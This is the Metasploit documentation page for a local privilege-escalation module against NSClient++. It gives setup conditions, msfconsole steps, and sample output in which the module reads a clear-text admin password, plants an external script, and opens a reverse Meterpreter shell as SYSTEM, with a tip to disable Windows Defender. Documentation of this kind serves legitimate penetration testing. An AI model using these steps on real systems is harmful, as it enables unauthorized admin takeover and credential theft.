CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/local/nscp_pe.md
Views: 11788

Vulnerable Application

Description

This module allows an attacker with an unprivileged windows account to gain admin access on windows system and start a shell. For this module to work, both web interface of NSClient++ and ExternalScripts feature should be enabled. You must also know where is the NSClient config file as it is used to read the admin password which is stored in clear text.

Installation

A vulnerable version of NSClient++ can be downloaded from [here]https://nsclient.org/download/). Then you can help yourself with this installation guide to complete the installation. Don't forget to enable the web interface and the ExternalScripts feature to allow the exploit to work.

Verification Steps

List the steps needed to make sure this thing works

  1. Start msfconsole

  2. use exploit/windows/local/nscp_pe

  3. set SESSION <session>

  4. set FILE <NSCP_config_file> if the NSCP config file is not C:\Program Files\NSClient++\nsclient.ini

  5. check to check if the targeted NSClient++ is vulnerable

  6. set payload <choose_a_payload> to set a specific payload to send

  7. run the module to exploit the vulnerability, gain admin access and start a shell

Options

FILE

Set the config file of NSClient++. If you don't know, try with the default value.

Scenarios

This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender as msf payload could be spotted). See the following output :

msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  12        meterpreter x64/windows  DESKTOP-T5N69RR\basic_user @ DESKTOP-T5N69RR  172.18.15.143:4444 -> 172.18.15.142:64307 (172.18.15.142)


msf6 exploit(nscp_pe) > set session 12
session => 12
msf6 exploit(nscp_pe) > run

[!] SESSION may not be compatible with this module (incompatible session type: meterpreter)
[*] Started reverse TCP handler on x.x.x.x:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Admin password found : easypassword
[+] NSClient web interface is enabled !
[+] The target is vulnerable. External scripts feature enabled !
[+] Admin password found : easypassword
[+] NSClient web interface is enabled !
[*] Configuring Script with Specified Payload . . .
[*] Added External Script (name: lrawsiaajn)
[*] Saving Configuration . . .
[*] Reloading Application . . .
[*] Waiting for Application to reload . . .
[*] Triggering payload, should execute shortly . . .
[*] Sending stage (200262 bytes) to y.y.y.y
[*] Meterpreter session 13 opened (x.x.x.x:4444 -> y.y.y.y:64309) at 2021-06-09 14:37:10 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM